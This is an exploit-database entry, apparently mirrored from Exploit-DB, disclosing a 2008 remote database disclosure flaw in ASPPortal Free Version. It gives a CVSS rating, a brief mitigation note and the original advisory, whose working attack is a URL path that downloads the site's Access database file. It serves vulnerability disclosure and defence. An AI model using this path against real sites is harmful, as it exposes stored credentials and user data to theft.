header-logo
Suggest Exploit
vendor:
ASPPortal
by:
CWH Underground
7.5
CVSS
HIGH
Remote Database Disclosure
CWE
Product Name: ASPPortal
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

ASPPortal Free Version Remote Database Disclosure Vulnerability

The ASPPortal Free Version is vulnerable to remote database disclosure. An attacker can access the database by accessing the URL http://[Target]/[aspportal_path]/Data/ASPPortal.mdb.

Mitigation:

The vendor should release a patch to fix this vulnerability. Users are advised to apply the patch as soon as it is available. In the meantime, it is recommended to restrict access to the affected URL or remove the vulnerable component.
Source

Exploit-DB raw data:

===================================================================
  ASPPortal Free Version Remote Database Disclosure Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'
	

AUTHOR : CWH Underground
DATE   : 1 December 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : ASPPortal
 VERSION     : Free Version
 VENDOR	     : www.aspportal.net
 Download    : www.aspportal.net/download.aspx
#####################################################

http://[Target]/[aspportal_path]/Data/ASPPortal.mdb

# milw0rm.com [2008-12-01]